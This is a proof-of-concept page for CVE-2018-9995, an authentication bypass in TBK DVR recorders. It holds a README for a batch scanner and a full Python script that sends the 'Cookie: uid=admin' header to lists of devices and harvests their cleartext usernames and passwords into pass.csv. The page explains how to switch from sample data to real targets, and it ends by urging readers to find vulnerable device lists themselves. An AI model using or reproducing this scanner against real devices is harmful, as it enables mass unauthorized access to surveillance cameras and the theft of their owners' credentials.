POC details: f7fc4d07718acaf7556239a1b192f36935faf619

Related vulnerability
Title: TBK DVR4104 and DVR4216 security vulnerability (CVE-2018-9995)
Description: TBK DVR4104 and DVR4216 are both high-definition digital video recorders. A security vulnerability exists in TBK DVR4104 and DVR4216. A remote attacker can exploit it to bypass authentication by sending a `Cookie: uid=admin` request header.
Description
CVE-2018-9995_Batch_scanning_exp
Introduction
# CVE-2018-9995_Batch_scanning_exp (last updated 2018-8-9)
A batch DVR scanning script for the CVE-2018-9995 vulnerability.

## [Original exploit script for CVE-2018-9995 (Original code)](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)

## Environment setup

Python 3 on Ubuntu:

```shell
user@ubuntu:~$ sudo pip3 install grequests
user@ubuntu:~$ sudo pip3 install tableprint
```

## Usage

Put the devices to be scanned, one per row in `ip:port` form, in the first column of a CSV file.

```python
import csv

# Each row's first column is "ip:port"; replace the file name with that of your own list.
csv_file = csv.reader(open('66b2f74b75457f73347f6a840bebc339.csv', 'r'))
```

Change the device-list file name above to that of your own list in the current working directory, then run the script:

```shell
user@ubuntu:~$ sudo python3 CVE-2018-9995_Batch_scanning_exp.py
```

Example output while it runs:

```text
-----------------------------------501-------------------------------------------------------------
-----------------------------------501-------------------------------------------------------------
-----------------------------------501-------------------------------------------------------------
-----------------------------------NO.1-------------------------------------------------------------

 [+] Users List:	1
 [+] Users List:	1
 [+] Users List:	1
 [+] Users List:	1
 [+] Users List:	1
 [+] Users List:	1
 [+] Users List:	2
 [+] Users List:	1
```

A separator line is printed after every 501 IPs; `NO.` gives the round number, and each `[+] Users List:` line gives the number of user accounts found on a device that was exploited successfully.

The results are written to a CSV file named pass.csv:

```text
--------+------+------+-------+------.......
ip:port | uid1 | pwd1 | role1 | uid2 .......
--------+------+------+-------+------.......
        |      |      |       |      .......
        |      |      |       |      .......
```

## Improvements over the original program

1. Fixed the problem that some devices answering with a 401 error returned no information.
2. Fixed the problem that some devices return malformed JSON.
3. Uses asynchronous HTTP requests, which greatly improves scanning throughput.
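As an added illustration of the usage procedure above and of the three improvements (this is example code written for this page, not the repository's script, and it uses only the Python standard library instead of grequests), the following reads an `ip:port` CSV, sends the `Cookie: uid=admin` bypass header to all targets concurrently, still parses the body when a device answers 401, tolerates JSON with trailing commas, writes rows in the pass.csv layout, and tallies weak passwords. The request path `/device.rsp?opt=user&cmd=list`, the JSON keys `list`/`uid`/`pwd`/`role`, the trailing-comma form of the malformed JSON, the weak-password list and all sample replies are assumptions constructed for this example; the page itself only states the cookie header and the pass.csv column layout.

```python
import csv
import io
import json
import re
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# ASSUMED endpoint and field names; the page only states the bypass header.
USER_LIST_PATH = "/device.rsp?opt=user&cmd=list"
AUTH_BYPASS_HEADERS = {"Cookie": "uid=admin"}

# ASSUMED small wordlist used to tally weak passwords in the results.
WEAK_PASSWORDS = {"", "admin", "123456", "password", "12345678"}


def read_targets(csv_text):
    """First CSV column holds ip:port; blank rows are skipped."""
    return [row[0].strip() for row in csv.reader(io.StringIO(csv_text))
            if row and row[0].strip()]


def lenient_json(body):
    """json.loads, retrying once after removing trailing commas before ] or }
    (the assumed shape of the malformed JSON some devices return)."""
    try:
        return json.loads(body)
    except json.JSONDecodeError:
        return json.loads(re.sub(r",\s*([\]}])", r"\1", body))


def extract_users(status, body):
    """Return [(uid, pwd, role), ...] from one device reply.
    A 401 status is deliberately not treated as failure: the body is parsed
    whatever the status, because some devices still include the list in it."""
    if not body or not body.lstrip().startswith("{"):
        return []
    try:
        data = lenient_json(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, dict):
        return []
    return [(str(u.get("uid", "")), str(u.get("pwd", "")), str(u.get("role", "")))
            for u in data.get("list", []) if isinstance(u, dict)]


def fetch_http(target, timeout=5):
    """Network fetcher: one GET with the bypass cookie; returns (status, body).
    HTTP errors such as 401 return their status and body instead of raising."""
    req = urllib.request.Request("http://%s%s" % (target, USER_LIST_PATH),
                                 headers=AUTH_BYPASS_HEADERS)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None, ""


def scan(targets, fetch=fetch_http, workers=50):
    """Query all targets concurrently; returns {target: users} for hits only."""
    hits = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for target, (status, body) in zip(targets, pool.map(fetch, targets)):
            users = extract_users(status, body)
            if users:
                hits[target] = users
    return hits


def to_rows(hits):
    """pass.csv layout: ip:port, uid1, pwd1, role1, uid2, pwd2, role2, ..."""
    rows = []
    for target in sorted(hits):
        row = [target]
        for uid, pwd, role in hits[target]:
            row += [uid, pwd, role]
        rows.append(row)
    return rows


def write_pass_csv(hits, path="pass.csv"):
    with open(path, "w", newline="") as f:
        csv.writer(f).writerows(to_rows(hits))


def weak_password_share(hits):
    """Fraction of recovered accounts whose password is in WEAK_PASSWORDS."""
    pwds = [pwd for users in hits.values() for _, pwd, _ in users]
    return sum(p in WEAK_PASSWORDS for p in pwds) / len(pwds) if pwds else 0.0


# Constructed sample data (TEST-NET addresses) so the example runs offline:
# a clean 200, a 401 whose body still carries a list with a trailing comma,
# and a host that does not answer at all.
SAMPLE_CSV = "192.0.2.10:80\n192.0.2.11:8080\n\n192.0.2.12:81\n"
SAMPLE_REPLIES = {
    "192.0.2.10:80": (200, '{"list":[{"uid":"admin","pwd":"123456","role":2}]}'),
    "192.0.2.11:8080": (401, '{"list":[{"uid":"admin","pwd":"admin","role":2},'
                             '{"uid":"user","pwd":"","role":1},]}'),
    "192.0.2.12:81": (None, ""),
}


def fake_fetch(target):
    """Stand-in for fetch_http that serves the constructed replies."""
    return SAMPLE_REPLIES.get(target, (None, ""))


if __name__ == "__main__":
    found = scan(read_targets(SAMPLE_CSV), fetch=fake_fetch)
    for row in to_rows(found):
        print(row)
    print("weak-password share: %.0f%%" % (100 * weak_password_share(found)))
```

Swap `fake_fetch` for the default `fetch_http` to run it against a real list; the thread pool gives the same concurrency benefit the README describes for grequests, and `extract_users` is where the 401 and malformed-JSON handling live, so that is the function to extend if a device returns yet another variant.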

## Known findings

1. Judging from the results returned by the major web-device search engines, about 50,000 devices are affected by this vulnerability; at present, any device that responds to a connection can be exploited to obtain its login accounts in clear text.
2. Scanning from inside China (behind the firewall), only a little over 6,000 devices responded.
3. The impact of the exploit is not as severe as expected: it only yields access to the video stream; obtaining further control over the device's operating system remains to be studied.
4. Weak passwords are really common: 80% of the scan results used weak passwords.
Getting a list of vulnerable devices is up to you; with a little thought it is easy to obtain. Have fun! XD
File snapshot

```text
[4.0K] /data/pocs/f7fc4d07718acaf7556239a1b192f36935faf619
├── [ 36K] CVE-2018-9995_Batch_scanning_exp.py
└── [3.6K] README.md

0 directories, 2 files
```